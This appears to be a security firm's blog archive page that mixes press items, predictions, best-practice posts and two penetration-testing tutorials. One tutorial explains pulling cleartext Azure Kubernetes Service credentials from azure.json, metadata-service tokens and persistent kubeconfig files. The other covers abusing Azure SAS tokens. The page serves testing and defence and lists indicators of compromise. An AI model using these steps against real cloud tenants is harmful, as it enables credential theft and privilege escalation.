
CMSWire: How Blockchain Is Enabling Digital Transformation

On January 31, 2022, Travis Hoyt was featured in a CMS Wire article titled, How Blockchain Is Enabling Digital Transformation. Preview the article below, or read the full article online here.

+ + +

Blockchain is not a new technology despite much of the hype about it in recent months. What is somewhat new is what’s behind the hype. It’s being driven not by the technology itself, but rather its applications and the digital workplace tools it enables.

For example, we have seen the key role that blockchain technology is playing in the enablement of Web3. But it is also playing a major role in the development of the metaverse and defining new ways to manage data, too. All of this has been facilitated by the evolution of blockchain technology itself.

The Future of Blockchain in Enterprise Businesses

The predominant focus of blockchain technology to date has been in the development and deployment of cryptocurrencies, tokens and other digital asset mediums with little impact on corporations and workplaces, said Travis Hoyt, chief technology officer at Minneapolis-based NetSPI, an information security provider.

But that is changing, Hoyt said, as companies start to look at the advantages of blockchain technology in areas of enterprise focus such as process flows, automation and simplification.

The result is that the blockchain market is expected to grow 68.4% over the next five years and become a key technology investment across the enterprise. Hiring for blockchain-related skills has also increased substantially, and that demand is expected to continue to grow.

The innovations that stem from adoption of this technology will create unique opportunities, Hoyt said, but also come with risks that many organizations are not ready to address. Blockchain-based architectures share many similarities to traditional architectures, web applications and APIs, and the underlying infrastructure is largely the same or very similar. But the introduction of a distributed data plane, smart contracts and consensus models will have a notable impact on the threat model for those deployments.

“It is clear that blockchain technology is here to stay,” Hoyt said. “As cities start to leverage it, or as corporations and governments look at its potential of operational efficiency, the allure of immutable data and the ability to have perfect transactional recollection increases.”

Data will also become easily accessible, he added, and will be a powerful driver of innovation.


How To Extract Credentials from Azure Kubernetes Service (AKS)

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Service (AKS) being used in Azure subscriptions. The service itself can be complicated and has a large attack surface. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it's not guaranteed, an existing Service Principal may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the "System-assigned" Managed Identity is actually a "User-assigned" Managed Identity that's created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There's no "Identity" menu in the AKS portal blade, so it's my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods has its own benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, the name of the cluster, and the region it was deployed in.

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.


Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.

The VMSS command execution can be done via the following options:

  • The Az PowerShell module (Invoke-AzVmssVMRunCommand)
  • The Az CLI (az vmss run-command invoke)
  • The Azure REST APIs (the VMSS runCommand action)
  • The Azure Portal ("Run command" on the VMSS instance)

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in earlier blog posts.

In this case, we will be using the VMSS command execution functionality to make a request to "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/". This will return a JWT that is scoped to the management.azure.com resource.

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (e.g., Key Vault), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.

Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Defender for Cloud (formerly Azure Security Center) should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.


TechRound: Cybersecurity Predictions for 2022

On January 25, 2022, Travis Hoyt, Florindo Gallicchio, Charles Horton, and Nabil Hannan were featured in TechRound’s 2022 Cybersecurity Predictions round up. Preview the article below, or read the full article online here.

  • Explore industry expert predictions on what’s in store for cybersecurity in 2022.
  • Cyber-attacks have remained a key concern throughout the COVID-19 pandemic. With 2021 now over, what does the new year have in store for cybersecurity?
  • We’ve collected predictions from industry experts, including HelpSystems’s Joe Vest, Gemserv’s Andy Green and more.

With many businesses continuing to work from home where possible and settling into a more hybrid style of work, cybersecurity has been a key concern across a range of industries.

Here, we’ve collected opinions from industry experts on what they predict 2022 has in store for cybersecurity.

Travis Hoyt, CTO at NetSPI

Attack surface management: “As organisations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organisations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organisations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organisations have a detailed understanding of their SaaS deployments and configurations, or face higher premiums or even a refusal of insurance altogether.”

Next generation architectures open new doors for security teams: "Interest in distributed ledger technology, or blockchain, is beginning to evolve beyond the cryptocurrency space. In 2022, we'll begin to see the conversation shift from bitcoin to discuss the power blockchain can have within the security industry. Companies have already started using this next generation architecture to better communicate in a secure environment within their organisations and among peers and partners. And I expect we'll continue to see this strategy unfold as the industry grows."

CFOs will make or break ransomware mitigation: "For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritising conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that covers all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don't lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds."

Florindo Gallicchio, Managing Director and Head of Strategic Solutions at NetSPI

Cybersecurity budgets will rebound significantly from lower spend levels during the pandemic: “As we look to 2022, cybersecurity budgets will rebound significantly after a stark decrease in spending spurred by the pandemic. Ironically, while COVID-19 drove budget cuts initially, it also accelerated digital transformation efforts across industries – including automation and work-from-home infrastructure, which have both opened companies up to new security risks, leading to higher cybersecurity budget allocation in the new year. Decisions are being made in Fortune 500+ companies with CFOs on the ground, as these risk-focused enterprises understand the need for larger budgets, as well as thorough budgeted risk and compliance strategies. Smaller corporations that do not currently operate under this mindset should follow the lead of larger industry leaders to stay ahead of potential threats that emerge throughout the year.”

Charles Horton, Chief Operations Officer at NetSPI

Company culture could solve the cybersecurity hiring crisis: “It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organisation.”

Nabil Hannan, Managing Director at NetSPI

2022 is the year for API security: “In 2022, we will see organisations turn their attention to API security risks, deploying security solutions and conducting internal audits aimed at understanding and reducing the level of risk their current API configurations and deployments create. Over the past few years, APIs have become the cornerstone of modern software development. Organisations often leverage hundreds, and even thousands, of APIs, and ensuring they are properly configured and secured is a significant and growing challenge. Compounding this issue, cyberattackers have increasingly turned to APIs as their preferred attack vector when seeking to breach an organisation, looking for vulnerable connection points within API deployments where they can gain access to an application or network. For these reasons, securing APIs will be a top priority throughout 2022.”

The Skills Shortage Will Continue Until Hiring Practices Change: “In 2022 the cybersecurity skills gap will persist, but organisations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, though, these programs will only have limited success. The real culprit behind the skills gap is that organisations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.”


NetSPI Exceeds 50% Organic Revenue Growth in 2021

NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.

Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees. 

To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.  

“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.” 

 
Achievements that contributed to NetSPI’s success in 2021 include: 

  • $90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets. 
  • Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business. 
  • New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks. 
  • Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which, if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
  • Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
  • IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI's new IoT testing services focus on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 


NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council

Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.  

“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.” 

“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”

Visit Travis’ profile and read his first published article, Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

About Forbes Councils 

Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive. 

For more information about Forbes Technology Council, visit forbestechcouncil.com. To learn more about Forbes Councils, visit forbescouncils.com

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 


Best Practices for Software Supply Chain Security

Today’s business environment extends far beyond traditional brick-and-mortar organizations. Due to an increased reliance on digital operations, the frequency and complexity of supply chain cyber attacks are growing exponentially. It’s apparent that business leaders can no longer ignore supply chain security, also known as vendor risk management or third-party security.

Not only did we see an increase in supply chain attacks in 2021, but the entire anatomy of an organization’s attack surface has evolved significantly. With more organizations shifting to a remote or hybrid workforce, we’ve seen a spike in cloud adoption and a heavy reliance on digital collaboration with third-parties.

Over the past few years we’ve introduced many new risks into our software supply chains. So, how do we ensure we don’t become the next SolarWinds or Accellion? In this blog, we reveal four supply chain security best practices to get you started on solid footing.

First, understand where the threats are coming from. 

With so many facets of the supply chain connected through digital products, organizations and security leaders need to understand which sectors are most vulnerable and where hackers can find holes — both internally and externally.

A recent study found that 70% of all breaches are caused by an outside force, and 17% specifically involved malware. This is to be expected: as software development has been outsourced more frequently, the doors have opened to traditional malware attacks and breaches. Businesses need to understand how and where their resources can be accessed, and whether these threats can be exploited. However, malicious code is notoriously difficult to detect. Standard code reviews won’t always identify these risks, as malicious code can be inserted into internally built software and mimic the look and feel of regular code. This is one of the biggest trends leaders must be aware of, and they must fully understand which threats could impact their organization.

In addition to malware, hackers have begun attacking multiple business assets outside of an organization’s supply chain through “island hopping,” a technique used in 50% of today’s cyber attacks. Security leaders need to identify and monitor island hopping attacks frequently to stay ahead of the threat. Gone are the days when hackers target an organization directly; instead, adversaries go after an organization’s partners to gain access to the target organization’s network.

Supply Chain Security Best Practices

How do organizations ensure they don’t become the weakest link in the supply chain? First and foremost, be proactive! Businesses must look at internal and external factors impacting their security protocol and implement these four best practices.

1. Enforce security awareness training.

Ensure you are training your staff not only when they enter the organization, but also on a continuous basis and as new business emerges. Every staff member, regardless of level or job description, should understand the organization’s view and focus on security, including how to respond to phishing attempts and how to protect data in a remote environment. For example, in a retail environment, all internal employees and third-party partners should understand PCI compliance, while healthcare professionals need a working knowledge of HIPAA. The idea is to get everyone on the same page so they understand the importance of sensitive information within an organization and can help mitigate a threat when it is presented.

2. Enact policy and standards adherence.

Adherence to policies and standards is how a business keeps progressing. But relying on a well-written standard that matches policy is not enough. Organizations need to adhere to those policies and standards; otherwise, they are meaningless. This is true when working with outside vendors as well. Generally, it’s best to set up a policy that meets an organization where it is and maps back to its business processes – a standard coherence within an organization. Once that’s understood, as a business matures, the policy must mature with it. This will create a higher level of security for your supply chain with fewer gaps.

In the past, we’ve spent a lot of time focusing on policies and recommendations for brick and mortar types of servers. With the new remote work and outsourcing increasing, it’s important to understand how policies transfer over when working with vendors in the new remote setting. 

3. Implement a vendor risk management program.

How we exchange information with people outside of our organization is critical in today’s environment. Cyber attacks through vendor networks are becoming more common, and organizations need to be more selective when choosing their partners.

Once partners are chosen, security teams and business leaders need to ensure all new vendors are assessed with a risk-based vendor management program. The program should address re-testing vendors according to their identified risk level. A well-established, risk-based vendor management program involves vendor training — follow this three-tiered approach to get started: 

  • Tier one: Organizations need to analyze and tier their vendors based on business risk so they can focus their security resources and ensure they’ve done their due diligence where it matters most. 
  • Tier two: Risk-based assessments. The higher the vendor risk, the more deeply their security program should be assessed to understand where an organization’s supply chain could be vulnerable – organizations need to pay close attention here. Vendors categorized as lower risk can be assessed through automated scoring, whereas medium-risk vendors require a more extensive questionnaire, and high-risk vendors should demonstrate the strength of their security program through penetration testing results. 
  • Tier three: Re-testing, which is arguably the most important step for long-term vendor security. Vendor assessments should be conducted at the start of a partnership, and repeated as that partnership grows, to make sure vendors are adhering to protocol. This helps confirm nothing is slipping through the cracks and that the safety policies and standards in place are constantly being met. 

4. Look at the secondary precautions. 

Once security awareness training, policy, and standards are in place, and organizations have established a successful vendor risk management program, they can look at secondary proactive measures to keep supply chain security top of mind. Tactics include, but are not limited to, attack surface management, penetration testing services, and red team exercises. These strategic offensive security activities can help identify where the security gaps exist in your software supply chain.

Now that so many organizations are working with outside vendors, third-party security is more important than ever. No company wants to fall victim to an attack that starts externally. The best way to prepare and decrease vulnerability is to have a robust security plan that the whole company understands. By implementing these four simple best practices early on, businesses can go into the new year with assurance that they won’t be the weakest link in the supply chain — and that they’re safeguarded from external supplier threats.

Want to learn more about how to strengthen your software supply chain security? Watch the on-demand webinar: "How NOT To Be The Weakest Link In The Supply Chain"

SC Magazine: Small, minority-led banks and credit unions face greater cyber risk

On January 11, 2022, NetSPI CTO Travis Hoyt was featured in an article written by Karen Hoffman for SC Magazine. Read the full article online here.

+ + +

In cybersecurity, as in many areas, the “little guy” gets squeezed. Such is the apparent case with the financial industry, where small and minority-led financial services institutions (FSIs) and credit unions are feeling greater pressure and impact from online threats.

In recent months, this has grown beyond a basic IT security issue, or even a banking issue, into a political one. FSI executives and the members of Congress who support them have made the case that smaller and emerging community-based FSIs need greater cybersecurity support from regulators, from larger fellow FSIs, and from the core processors that typically support these small FSIs.

As Travis Hoyt, chief technology officer at NetSPI, pointed out, smaller banks, minority-led institutions, and credit unions have had an issue with cyberattacks for a number of years, oftentimes because they are unable to “attract and retain the talent needed to staff robust security teams, especially when faced with competition by larger FSIs with bigger budget allocations.”

“This challenge is exacerbated by the fact that the larger FSIs, while still a target, are more difficult to hack into than their smaller counterparts,” Hoyt added, “which entices threat actors into targeting the arguably softer, smaller targets without effective cyber control capabilities.”


Strategic Penetration Testing is the Future

Cybersecurity is a moving target. As adversaries evolve, the methodologies we use to protect our businesses must evolve in tandem.  

Penetration testing is a great example of a category that must continuously innovate to keep pace with attackers. After all, the goal of penetration testing services is to emulate real-world attack tactics, techniques, and procedures (TTPs) as accurately as possible. 

Traditional penetration testing cannot keep pace with the realities of business agility and hacker ambitions. Without innovation and evolution, it remains slow, stodgy, inconsistent, and simply checks a compliance box. So, how do we drive the industry forward? Strategy is key, according to Manish Khera, CISO at a national utilities company. 

I recently invited Manish on the Agent of Influence podcast, a place to share best practices and trends in the world of cybersecurity and vulnerability management. We dove deep into the future of penetration testing, among other topics. When discussing the evolution of pentesting, he believes strategy is key – and I couldn’t agree more. Taking a strategic approach to security testing is vital. Continue reading to learn why, and for highlights from our conversation. 

Do you believe the security mindset has migrated to a more proactive approach today? Or do you think there’s more work that needs to happen? 

Manish: I think we have become more proactive. Is it working? Hard to say. We have created proactive programs like AppSec and the concept of shifting left for example. We talk about security assessments and consulting, and security is getting involved earlier on projects. We’re making sure that it’s not a “stage gate” pentest that occurred to assess a project. We’ve obviously grown and matured in that regard.  

So, what is the right approach? If we’re too proactive, we may miss some of the needs for last-minute reviews. A pentest before a go-live for an external facing application, for example, is a good best practice. Ideally, we have good application security processes in place early on – SAST, DAST, whatever scans, plugins, et cetera, to get a better feel of low hanging fruit. It is a tough hill to climb balancing proactive and reactive security, but we are getting better. 

Nabil: You mentioned something that resonates well with how I talk about pentesting. Ultimately, people tend to start their security practices with penetration testing as a way to discover vulnerabilities. But I think as you mature, you have to change that mindset to view pentesting as a way to determine how effective our other controls are. Keeping that in mind… 

How does penetration testing need to evolve based on the trends you’re seeing in the industry? 

Manish: I think you and I are of one mind in this space. I do agree with you 100% that pentesting has to evolve. It shouldn’t be a report card or simply a way to find vulnerabilities; it should be the sum total of great activities up to that point. For future pentesting, we must do a couple different things.

Listen Now: Application Security and Penetration Testing Insights from a Utilities Sector CISO. Episode 29 of Agent of Influence with Manish Khera

Organizations should be more thoughtful about their approach. We should be willing to spend the money to threat model, so we can give proper avenues to pentesting vendors or internal pentesting teams. Organizations are often afraid to engage a pentesting vendor over a long period of time, feeling they’ve spent too much money on pentesting. However, we need to threat model, work with that vendor, and spend time with them to make sure they have enough time and resources to find not just the vulnerabilities they’re lucky to find, but also business-context vulnerabilities. 

If I say “you have two weeks to get this done,” that is not really a good pentest. Get that vendor in, spend a day with them, have them understand what the actual threat vectors are, what the important parts of that application and its data sets are, what the target would be for an informed, authenticated user, and so on. Then give them time to figure it out. The vendor should be smart about it too; it’s on both sides to be smart about it. It can’t be a time-boxed, very slim-budget event. It’s got to be thoughtful and threat-focused versus, “I have 50k to spend on a pentest.” 

I also think that the “shift left” marketing schemes have to come into play. We’ve got to get better integrated in using scans, using IDE plugins, and teaching developers how to code better. We call this a security champions program. Have somebody from the development team join the appsec team and work with them to better understand appsec processes. Then, they go back to the development team and become champions who speak the same language across teams. 

All of a sudden, pentesting becomes an event that clears the scorecard. If you practice good security up to that point, the vulnerabilities you find are more likely to be small efforts versus huge efforts that delay projects from going live. I hope that pentesting matures in that regard – but only time will tell.

Threat modeling can be time consuming, but valuable. Can you share a scenario where you found that threat modeling something, and then using that to drive a pentest or a security activity, was more valuable? 

Manish: The first time you do threat modeling is always the heaviest lift. Determining what framework to follow and how to create the process so that it is repeatable is most time consuming. But it does get easier over time if you follow a consistent framework. Especially if you have the same teams involved or a threat modeling champion engaged when a vendor comes in to do the threat modeling engagement.  

In terms of a key win or scenario, every time we do it, we find a better way to approach a pentest or improve our security activities. Every threat modeling assessment produces something that is shocking or surprising. I think you should always do it, because there’s always an opportunity to gain a better understanding of your applications and enable better tests. 

Essentially, coming in “blind” to do a pentest is rarely as valuable as having more details and information about how the system is architected. Taking an approach where you’re enabling your pentesters with as much detail as possible only allows you to get better results. I’m not a big fan of “black box” testing or unauthenticated testing. We should assume that an adversary has deep inside knowledge of the environment, because they likely do. They can buy it or coerce somebody to give it to them – they can get it one way or another. We have to open our eyes to that scenario. We want informed testing and we want detailed reviews. That’s how we drive value. 

For more on the future of penetration testing – plus, insights on cybersecurity challenges in the utilities sector, consultancy vs. in-house security leadership roles, how to build a security champions program, and more – listen to episode 29 of Agent of Influence, featuring Manish Khera.


Azure SAS Tokens for Web Application Penetration Testers

Let’s say you’re performing a web application penetration test and you see that the site links to a URL that looks like the following:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

Following that link, you can see that the content of testsastokenblob.txt is served to you. But do you realize that you’ve also been given access to list, read, and write all the blobs in the container? Do you realize that you’ve also been given access to the File service in the storage account? This blog will teach you what the above URL really is, how to understand each component, and how to identify opportunities for deeper access into an application’s cloud storage. 

TL;DR

For readers who recognize the above URL and are already familiar with the concept of Azure SAS tokens, feel free to jump to the examples section below. There are breakdowns and manipulations for the following scenarios:

  1. A user SAS with read and list permissions.
  2. An account SAS with read and list permissions for both the Blob and File services.
  3. A read-only account SAS and multiple storage containers.

If these are new concepts or you’d like a refresher on the details, continue below to learn more.

What is that URL anyway?

That URL is a shared access signature (SAS) which provides direct access to content stored in an Azure storage account. To understand its purpose, first consider a traditional web application with file uploads/downloads. This functionality needs to be built into the application itself, and all the content passes through the application on its way to the file system.

Shared access signatures provide an alternative for applications using Azure storage accounts. Rather than handling uploads/downloads within the application, the application authorizes the client to store, retrieve and manage content within the cloud storage directly. The SAS identifies the resource(s) to be accessed and includes the client’s proof of authorization.

Traditional versus Direct Cloud Storage

Breaking down the Shared Access Signature

When we come across a shared access signature on a pentest, we need to understand what access we’ve been granted. Almost all the information we need is provided in the SAS itself. But to best understand it, we’ll need to break it down and inspect each part. 

That long SAS is composed of two main parts:

  1. The Storage Resource URL:
    https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt
  2. The SAS Token:
    sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

We’ll take a closer look at both of those halves. Let’s start with the storage resource URL.

The Storage Resource URL

The storage resource URL identifies the content within the storage account that will be accessed. This content may be a blob, directory, container, file, queue, or table. To identify which resource we’re given access to, we can break down this URL into two parts: the domain name and the URL path.  

The Domain Name

The domain name in the storage resource URL has the following format:
<storage_account_name>.<service_id>.core.windows.net

Let’s look at our example from earlier:
testsastokenaccount.blob.core.windows.net

We can identify that the storage account name is testsastokenaccount. While the SAS won’t provide access across storage accounts, the name itself can provide a starting place for guessing other valid storage accounts. For example, if our SAS pointed to companystorage1 or companystorage-prod, we may successfully guess that companystorage2 or companystorage-dev storage accounts exist. And if we’re truly lucky, those storage accounts may allow public access.

The domain name also identifies the storage service that the SAS provides access to. The <service_id> placeholder can have one of the following values:

  1. blob: Azure Blob Storage
  2. file: Azure File Storage
  3. queue: Azure Queue Storage
  4. table: Azure Table Storage

One SAS token may provide access to multiple storage services within a storage account. This means that if our SAS authorizes us to perform List operations against a container in Blob storage, we should check if we can also perform List operations against directories in File storage. 

The URL Path

